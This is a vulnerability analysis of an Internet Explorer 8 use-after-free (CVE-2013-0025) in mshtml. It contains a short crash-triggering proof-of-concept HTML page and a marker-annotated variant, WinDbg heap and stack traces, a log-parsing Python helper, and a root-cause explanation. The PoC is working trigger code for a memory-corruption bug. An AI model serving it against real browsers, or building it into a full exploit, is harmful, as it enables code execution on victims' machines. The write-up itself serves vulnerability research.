CVE-2013-0025
Microsoft IE 'SLayoutRun' Use-After-Free Vulnerability (CNNVD-201302-197)
Microsoft Internet Explorer is the web browser bundled by default with Microsoft Windows.
A use-after-free vulnerability exists in SLayoutRun in Microsoft Internet Explorer 8: a crafted web page can trigger access to an already-deleted object, which a remote attacker could use to execute arbitrary code.
Test environment
Windows 7
IE 8.0.7600.16385
The PoC code is as follows:
<!doctype html>
<html>
<head></head>
<body>
<p> </p>
<script>
Math.tan(2,3);  // marker call: a breakpoint on jscript!tan locates this point in the debugger
document.body.style.whiteSpace = "pre-line";
setTimeout("document.body.innerHTML = 'i'", 100);  // replaces the <p>, which frees its CParaElement
</script>
</body>
</html>
1:023> r
eax=1ca0afb0 ebx=0411e8d8 ecx=00000000 edx=10001000 esi=1ceaefd8 edi=1ceaefd8
eip=65477386 esp=0411e84c ebp=0411e84c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!ElementWantsNotification+0x5:
65477386 f7461c00000008 test dword ptr [esi+1Ch],8000000h ds:0023:1ceaeff4=????????
1:023> !heap -p -a esi
address 07620fd8 found in
_DPH_HEAP_ROOT @ 1a1000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
75e06e8:
6fcd90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
ntdll!RtlDebugFreeHeap+0x0000002f
77857aca ntdll!RtlpFreeHeap+0x0000005d
77822d68 ntdll!RtlFreeHeap+0x00000142
771af1ac kernel32!HeapFree+0x00000014
6a2a930e mshtml!operator delete[]+0x00000016
6a318c8d mshtml!CParaElement::`vector deleting destructor'+0x0000001f
6a2b7dd0 mshtml!CBase::SubRelease+0x00000022
6a310fdf mshtml!CElement::PrivateExitTree+0x00000011
6a1f5b42 mshtml!CMarkup::SpliceTreeInternal+0x00000083
6a1f6ff9 mshtml!CDoc::CutCopyMove+0x000000ca
6a1f6f39 mshtml!CDoc::Remove+0x00000018
6a1f6f17 mshtml!RemoveWithBreakOnEmpty+0x0000003a
6a1f7aef mshtml!InjectHtmlStream+0x00000191
6a1f793e mshtml!HandleHTMLInjection+0x0000005c
6a1f71fa mshtml!CElement::InjectInternal+0x00000307
6a1f704a mshtml!CElement::InjectCompatBSTR+0x00000046
6a1f988c mshtml!CElement::put_innerHTML+0x00000040
6a3372d6 mshtml!GS_BSTR+0x000001ac
6a32235c mshtml!CBase::ContextInvokeEx+0x000005dc
6a32c75a mshtml!CElement::ContextInvokeEx+0x0000009d
6a32c79a mshtml!CInput::VersionedInvokeEx+0x0000002d
6a2d3104 mshtml!PlainInvokeEx+0x000000eb
6c75a22a jscript!IDispatchExInvokeEx2+0x00000104
6c75a175 jscript!IDispatchExInvokeEx+0x0000006a
6c75a3f6 jscript!InvokeDispatchEx+0x00000098
6c75a4a0 jscript!VAR::InvokeByName+0x00000139
6c76d8c8 jscript!VAR::InvokeDispName+0x0000007d
6c759c0e jscript!CScriptRuntime::Run+0x0000208d
6c765c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
6c765bfb jscript!ScrFncObj::Call+0x0000008d
6c765e11 jscript!CSession::Execute+0x0000015f
Reuse:
1:023> r
eax=1ca0afb0 ebx=0411e8d8 ecx=00000000 edx=10001000 esi=1ceaefd8 edi=1ceaefd8
eip=65477386 esp=0411e84c ebp=0411e84c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!ElementWantsNotification+0x5:
65477386 f7461c00000008 test dword ptr [esi+1Ch],8000000h ds:0023:1ceaeff4=????????
Allocation:
1:021> g
Breakpoint 2 hit
eax=077e6fd8 ebx=07cfefd0 ecx=7721349f edx=00000000 esi=077e6fd8 edi=07d59f70
eip=6830480f esp=0440f4a4 ebp=0440f4b0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CElement::CElement:
6830480f 8bff mov edi,edi
1:021> dd eax
077e6fd8 00000000 00000000 00000000 00000000
077e6fe8 00000000 00000000 00000000 00000000
077e6ff8 00000000 00000000 ???????? ????????
077e7008 ???????? ???????? ???????? ????????
077e7018 ???????? ???????? ???????? ????????
077e7028 ???????? ???????? ???????? ????????
077e7038 ???????? ???????? ???????? ????????
077e7048 ???????? ???????? ???????? ????????
1:021> kv
ChildEBP RetAddr Args to Child
0440f4a0 68322dbf 0000004d 05832680 0440f4c4 mshtml!CElement::CElement
0440f4b0 68327e98 0000004d 05832680 07cfef08 mshtml!CBlockElement::CBlockElement+0x12
0440f4c4 68304be9 07d59f70 05832680 0440f500 mshtml!CParaElement::CreateElement+0x26
0440f4f0 68308961 0440f524 07a04f30 00000000 mshtml!CreateElement+0x43
0440f51c 68306e93 00000000 071fafb0 07d59f70 mshtml!CHtmParse::ParseBeginTag+0xe3
0440f538 683075c9 7710ef76 071fafb0 071fafb0 mshtml!CHtmParse::ParseToken+0x82
0440f5e0 682f78e8 071fafb0 0af194c6 0af194c6 mshtml!CHtmPost::ProcessTokens+0x237
0440f6a4 682f8a99 0af194c6 00000000 071fafb0 mshtml!CHtmPost::Exec+0x221
0440f6bc 682f89fd 0af194c6 00000000 071fafb0 mshtml!CHtmPost::Run+0x15
0440f6dc 682f7c66 057e4d58 0af194c6 071fafb0 mshtml!PostManExecute+0x1fb
0440f6f8 683113f6 00000001 00000007 0440f718 mshtml!PostManResume+0xf7
0440f708 682f53fc 07d06f98 071fafb0 0440f74c mshtml!CHtmPost::OnDwnChanCallback+0x10
0440f718 683994b2 07d06f98 00000000 057e4d58 mshtml!CDwnChan::OnMethodCall+0x19
0440f74c 683837f7 0440f7e8 00008002 00000000 mshtml!GlobalWndOnMethodCall+0xff
0440f76c 76c686ef 004c0314 00000008 00000000 mshtml!GlobalWndProc+0x10c
0440f798 76c68876 68371de3 004c0314 00008002 USER32!InternalCallWinProc+0x23
0440f810 76c689b5 00000000 68371de3 004c0314 USER32!UserCallWinProcCheckWow+0x14b (FPO: [Non-Fpo])
0440f870 76c68e9c 68371de3 00000000 0440f8f8 USER32!DispatchMessageWorker+0x35e (FPO: [Non-Fpo])
0440f880 6ea704a6 0440f898 00000000 017ecf58 USER32!DispatchMessageW+0xf (FPO: [Non-Fpo])
0440f8f8 6ea80446 04fba808 00000000 02f40ff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x452 (FPO: [Non-Fpo])
Free:
(68327ec0) mshtml!CParaElement::`vftable' | (68328169) mshtml!CStyleSelector::SetSelectorPart
Exact matches:
mshtml!CParaElement::`vftable' = <no type information>
ChildEBP RetAddr Args to Child
0438eddc 68387db6 0791cf30 00000000 0438ef48 mshtml!CBase::SubRelease (FPO: [0,0,0])
0438edec 683e0fdf 07f2afd8 00000000 682c660e mshtml!CBase::PrivateRelease+0x3c
0438edf8 682c660e 0791cf30 00000000 00000018 mshtml!CElement::PrivateExitTree+0x11 (FPO: [0,0,1])
0438ef48 682c5b42 0438f06c 0438efbc 00000000 mshtml!CSpliceTreeEngine::RemoveSplice+0x841
0438f028 682c6ff9 0438f060 0438f06c 00000000 mshtml!CMarkup::SpliceTreeInternal+0x83
0438f078 682c6f39 0438f220 0438f25c 00000001 mshtml!CDoc::CutCopyMove+0xca
0438f094 682c6f17 0438f220 0438f25c 00000000 mshtml!CDoc::Remove+0x18
0438f0ac 682c7aef 0438f25c 07b70e74 683791b8 mshtml!RemoveWithBreakOnEmpty+0x3a
0438f1a8 682c793e 0438f220 0438f25c 0438f1d0 mshtml!InjectHtmlStream+0x191
0438f1e4 682c71fa 0438f220 0438f25c 00000002 mshtml!HandleHTMLInjection+0x5c
0438f29c 682c704a 00000000 00000001 07b70e74 mshtml!CElement::InjectInternal+0x307
0438f2b8 682c988c 05680fd0 00000000 00000001 mshtml!CElement::InjectCompatBSTR+0x46
0438f2d8 684072d6 00680fd0 07b70e74 07b7ffd0 mshtml!CElement::put_innerHTML+0x40
0438f308 683f235c 05680fd0 07b7ffd0 07039fd8 mshtml!GS_BSTR+0x1ac
0438f37c 683fc75a 05680fd0 80010402 00000002 mshtml!CBase::ContextInvokeEx+0x5dc
0438f3cc 683fc79a 05680fd0 80010402 00000002 mshtml!CElement::ContextInvokeEx+0x9d
0438f3f8 683a3104 05680fd0 80010402 00000002 mshtml!CInput::VersionedInvokeEx+0x2d
0438f44c 6bcfa22a 06b12fd8 80010402 00000002 mshtml!PlainInvokeEx+0xeb
0438f488 6bcfa175 07328d10 80010402 00000409 jscript!IDispatchExInvokeEx2+0x104
0438f4c4 6bcfa3f6 07328d10 00000409 00000004 jscript!IDispatchExInvokeEx+0x6a
(96c.c6c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07912fb0 ebx=0438edb8 ecx=00000000 edx=10001000 esi=07f2afd8 edi=07f2afd8
eip=68387386 esp=0438ed2c ebp=0438ed2c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!ElementWantsNotification+0x5:
68387386 f7461c00000008 test dword ptr [esi+1Ch],8000000h ds:0023:07f2aff4=????????
Next, try to map the allocation, free and reuse back to JavaScript statements. Math.sin and Math.cos calls are inserted as markers so that breakpoints on jscript!tan, jscript!sin and jscript!cos show which part of the script has executed when each event happens.
Modified PoC:
<!doctype html>
<html>
<head></head>
<body>
<p> </p>
<script>
Math.tan(2,3);   // marker 1: breakpoint on jscript!tan
document.body.style.whiteSpace = "pre-line";
Math.sin(0);     // marker 2: breakpoint on jscript!sin
setTimeout("document.body.innerHTML = 'i'",100);
Math.cos(0);     // marker 3: breakpoint on jscript!cos, end of the script body
</script>
</body>
</html>
The CParaElement involved in the UAF is the one created by the <p> </p> element:
1:020> g
Breakpoint 1 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d8c0 esp=0423ecf4 ebp=0423ed30 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
jscript!tan:
6be7d8c0 ff258010e56b jmp dword ptr [jscript!_imp__tan (6be51080)] ds:0023:6be51080={msvcrt!tan (758dde34)}
1:020> g
Breakpoint 3 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d711 esp=0423ecf4 ebp=0423ed30 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
jscript!sin:
6be7d711 ff256810e56b jmp dword ptr [jscript!_imp__sin (6be51068)] ds:0023:6be51068={msvcrt!sin (758d8aea)}
1:020> g
Breakpoint 2 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d67f esp=0423ecf4 ebp=0423ed30 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
jscript!cos:
6be7d67f ff259010e56b jmp dword ptr [jscript!_imp__cos (6be51090)] ds:0023:6be51090={msvcrt!cos (758d8ace)}
1:020> g
eax=06cd5b88 ebx=00000000 ecx=0792afd8 edx=686f5100 esi=07020fd0 edi=00000384
eip=68387d27 esp=0423df4c ebp=0423df60 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8 add dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=00000010
1:020> g
eax=06cd5b88 ebx=00000000 ecx=0792afd8 edx=686f5100 esi=07020fd0 edi=00000384
eip=68387d27 esp=0423df4c ebp=0423df60 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8 add dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=00000010
1:020> g
eax=00000043 ebx=00000000 ecx=0792afd8 edx=00000000 esi=0792afd8 edi=00000000
eip=68387d27 esp=0423e8f8 ebp=0423e904 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8 add dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=0000000a
1:020> g
(6b0.f20): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=079d2fb0 ebx=0423e8d0 ecx=00000000 edx=10001000 esi=0792afd8 edi=0792afd8
eip=68387386 esp=0423e844 ebp=0423e844 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!ElementWantsNotification+0x5:
68387386 f7461c00000008 test dword ptr [esi+1Ch],8000000h ds:0023:0792aff4=????????
Free: from CElement::put_innerHTML in the backtrace, the free is caused by document.body.innerHTML = 'i' in the PoC.
Reuse: no JavaScript statement corresponds directly to the reuse; the SubRelease calls and the access violation are all hit after the last marker (jscript!cos), that is, after the script body has finished executing.
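As an added example (not part of the original post), the script below automates the marker-based reading used above: it walks a saved WinDbg log, records which jscript!tan/sin/cos breakpoint fired last before each mshtml!CBase::SubRelease stop and before the access violation, and checks that the object being released (ecx, the this pointer in SubRelease) is the one dereferenced at the fault (esi in test dword ptr [esi+1Ch],...). The embedded log is a constructed excerpt modelled on the session shown above.

```python
# Added example, not from the original post: attribute WinDbg stops to PoC marker regions.
import re

MARKERS = ("jscript!tan", "jscript!sin", "jscript!cos")        # breakpoints on the marker calls
REG_RE = re.compile(r"\b(e[abcd]x|e[sd]i)=([0-9a-f]{8})")       # eax..edx, esi, edi in an 'r' dump
STOP_RE = re.compile(r"^(\w+!\S+):$")                            # e.g. "mshtml!CBase::SubRelease:"

# Constructed log excerpt (values modelled on the post's session), used as sample input.
LOG = """\
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
jscript!tan:
jscript!sin:
jscript!cos:
eax=06cd5b88 ebx=00000000 ecx=0792afd8 edx=686f5100 esi=07020fd0 edi=00000384
mshtml!CBase::SubRelease:
(6b0.f20): Access violation - code c0000005 (first chance)
eax=079d2fb0 ebx=0423e8d0 ecx=00000000 edx=10001000 esi=0792afd8 edi=0792afd8
mshtml!ElementWantsNotification+0x5:
"""

def parse_stops(text):
    """Return (symbol, is_fault, last_marker, regs) for every stop in the log."""
    stops, regs, last_marker, fault = [], {}, None, False
    for line in (l.strip() for l in text.splitlines()):
        if "Access violation" in line:
            fault = True                     # the register dump for the fault follows
        elif REG_RE.search(line):
            regs.update(REG_RE.findall(line))
        elif STOP_RE.match(line):
            sym = STOP_RE.match(line).group(1)
            stops.append((sym, fault, last_marker, regs))
            if sym in MARKERS:
                last_marker = sym            # later stops are attributed to this marker
            regs, fault = {}, False
    return stops

def attribute(text):
    """[(kind, last_marker, object_address)] for each SubRelease stop and the faulting use."""
    out = []
    for sym, fault, marker, regs in parse_stops(text):
        if sym.startswith("mshtml!CBase::SubRelease"):
            out.append(("free", marker, regs.get("ecx")))  # ecx = this (__thiscall)
        elif fault:
            out.append(("use", marker, regs.get("esi")))   # esi = pointer in [esi+1Ch]
    return out

def freed_then_used(text):
    """True if the faulting pointer equals an object earlier passed to SubRelease."""
    ev = attribute(text)
    return any(k == "use" and a in {x[2] for x in ev if x[0] == "free"} for k, _, a in ev)
```

On the sample log both the release and the fault are attributed to the region after jscript!cos, and the freed and faulting addresses match, which is the same reading the post reaches by hand.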
Root cause analysis
The root cause of this vulnerability is that a CTreeNode is not released and keeps a dangling pointer to the freed CParaElement object; the CTreeNode is not released because a CTreeDataPos object holds an incorrect reference to it.